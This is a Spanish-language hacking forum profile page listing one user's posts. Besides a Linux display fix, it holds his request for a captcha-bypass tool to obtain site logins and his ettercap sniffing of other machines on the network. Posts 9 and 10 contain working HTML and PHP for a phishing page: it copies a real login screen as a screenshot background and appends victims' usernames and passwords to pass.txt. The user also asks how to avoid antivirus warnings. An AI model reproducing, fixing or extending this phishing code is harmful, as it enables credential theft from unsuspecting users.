elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: [1] 2
1  Sistemas Operativos / GNU/Linux / Re: Pantalla en negro, tanto con Ubuntu 10.10 como Kubuntu 10.04 en: 30 Enero 2011, 15:46 pm
Finalmente lo solucione conectado el pc por la integrada en placa, una vez instalado todo, le he instalado drivers nvidia y luego le he puesto la tarjeta nvidia.

Un saludo y espero que a alguien le sirva.
2  Sistemas Operativos / GNU/Linux / [SOLUCIONADO] Pantalla en negro, tanto con Ubuntu 10.10 como Kubuntu 10.04 en: 29 Enero 2011, 20:17 pm
Buenas tardes,

Resulta que tengo un ordenador el cual he decidido tener 3 discos duros que ir alternando con diferentes S.O. para hacer pruebas. El caso es que con windows 7 no he tenido ningun problema, con windows 2008 server tampoco, pero encuanto voy a instalar una distro de Linux, arranca el live cd. acaba el assistente de instalancion diciendome que todo esta correctamente y que solo queda reiniciar, reinicio y al arrancar se me queda el monitor sin conexion (parpadenado el led) como cuando pones una resolucion que no admite el monitor?? pero no creo que sea, ya que el monitor aguanta mucha resolucion, la tarjeta grafica es una 9600GT. La verdad es que no se que puede ser, ya que muchas veces antes he instalado esas mismas versiones de ubuntu y kubuntu en otros equipos y nunca he tenido este problema.

Gracias y un saludo!

EDITO: Efectivamente, si lo conecto con la tarjeta integrada en placa si funciona. Como hago para solucionar el problema con la otra grafica?
3  Seguridad Informática / Hacking / Re: Captcha Killer v2 en: 30 Diciembre 2010, 15:11 pm
Ni un "por donde empezar"?  :-( Estos dias he sigido intentandolo y nada.. como mucho el http_bugger pero no me sirve
4  Seguridad Informática / Hacking / Captcha Killer v2 en: 28 Diciembre 2010, 14:42 pm
Buenos Tardes!

Llevo, horas/dias buscando esta herramienta "captcha killer" y el tema la verdad es que esta bastante complicado, agradeceria mucho si alguien me pudiera indicar donde descargarla o por donde seguir buscando... Por si conocis alguna herramienta similar es para intentar sacar usuarios y contraseñas de una pagina web la cual tiene el captcha para hacer el login.

Seria un bonito regalo de navidad jaja

Un saludo y muchas gracias por adelantando.
5  Seguridad Informática / Hacking / Re: Ettercap se cierra solo! en: 24 Julio 2010, 00:05 am
Si claro, ejecutandolo como root. si lo ejecuto en consola y no en entorno grafico cuando voy a elegir opciones me bailan las letras y se ponen caracteres raros :huh: con el entorno grafico pues aveces a la segunda me lo abre bien, otras a la 5 ... porque puede ser? tengo la version 32 bits, he leido que la 64 da problemas... pero tampoco es mi caso.

Sobre el error comento en la segunda parte del post sabeis algo??

Gracias.
6  Seguridad Informática / Hacking / Ettercap se cierra solo! en: 23 Julio 2010, 17:01 pm
Buenas tardes,

Uso Ubuntu 10.04 , he instalado las librerias para el ettercap , luego la ultima version del ettercap, ha funcionado una vez, he conseguido datos de otros equipos de la red, acontinuacion he cerrado el problema y al volverlo a abrir cuando voy a escanear hosts.. se cierra sin ningun tipo de error  :huh:
¿Porque sera?

Un saludo y gracias.

EDITO: ahora por arte de magia no se a cerrado, sigo con la duda de porque? y ademas me he fijado haciendo pruebas que me saca "errores" de este tipo bastante a menudo:

"SEND L3 ERROR: 61 byte packet (0800:11) destined to X.X.X.X was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operación no permitida)"
7  Programación / PHP / Re: Pagina PHP/HTML antivirus y problemas... en: 7 Mayo 2008, 16:39 pm
Gracias, he leído algo de que se puede saltar con frames? leeré todo bien.

Un saludo
8  Programación / PHP / Re: Pagina PHP/HTML antivirus y problemas... en: 6 Mayo 2008, 20:15 pm
pos no veo normal que por ese código salte el antivirus... si pensara que es normal no podría este mensaje ^^
9  Programación / PHP / Pagina PHP/HTML antivirus y problemas... en: 2 Mayo 2008, 15:40 pm
Buenas tardes, tengo un problema, hice una pagina en html "imitando" otra, de tal forma que cogí la pagina original hice una captura de pantalla y la puse como fondo de mi pagina, luego en lugar de la imagen donde esta para meter usuario y contraseña puse yo "encima" otro formulario donde se pueda escribir y luego un botón de iniciar sesión nuevo.

El problema es que hay gente que me dice al entrar a la web que le salta el antivirus... se me hace muy raro (Ahora os pego el código de la web) también tengo otro problema y es que al abrirlo con el internet explorer 7 digamos que no es lo mismo que abrirlo con firefox porque el fondo no tiene la misma posición, sigamos que se mueve de sitio y lo que yo añado encima se descoloca de la pagina (El formulario y el botón de iniciar sesión) como podría solucionar eso? para que en todos exploradores se viera igual la posición del fondo de la web (captura de pantalla de la web original) y mis formularios (añadidos encima de la captura) ??

Y por ultimo en internet explorer 7 me sale un mensaje para permitir la ejecución de la pagina algo como que no reconoce el software de edición html.

Aquí el código:

Código:
<html>
<body background="fondo.jpg">
<form action="procesa.php" method="GET">
<input name="usuario" type="text" size="43"/>
<input name="password" type="password" size="43"/>
<input type="submit" value="Iniciar Sesión">
</form>
</body>
</html>

y la php:

Código:
<html>
<body background="error.jpg">
<?
$user=$_GET[usuario];
$pass=$_GET[password];
?>

<?php
$nombre_archivo = 'pass.txt';
$contenido = "$user////$pass";

if (is_writable($nombre_archivo)) {

if (!$gestor = fopen($nombre_archivo, 'a')) {
echo "";
exit;
}

if (fwrite($gestor, $contenido) === FALSE) {
echo "No se puede escribir al archivo ($nombre_archivo)";
exit;
}

echo "";
fclose($gestor);
} else
{
echo "";
}
?>
</body>
</html>

Cualquier ayuda y/o consejo sera agradecido ;)
10  Programación / PHP / Re: PHP password y usuario en: 27 Abril 2008, 15:45 pm
Me he estao informando y algo avanzo ^^, pero tengo problemas, te comento, encontre este codigo:
Código:
<?php
$nombre_archivo = 'pass.txt';
$contenido = "Aqui el texto que mete al txt";

if (is_writable($nombre_archivo)) {

if (!$gestor = fopen($nombre_archivo, 'a')) {
echo "No se puede abrir el archivo ($nombre_archivo)";
exit;
}

if (fwrite($gestor, $contenido) === FALSE) {
echo "No se puede escribir al archivo ($nombre_archivo)";
exit;
}

echo "Éxito, se escribió ($contenido) al archivo ($nombre_archivo)";
fclose($gestor);
} else
{
echo "No se puede escribir sobre el archivo $nombre_archivo";
}
?>

como puedo meter envede "aqui el contenido" meter una variable?? porque no me deja :( y mas que una variable... dos, porque tendria que ser user y pass, o podoria meter esas dos variables a una misma antes?

Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines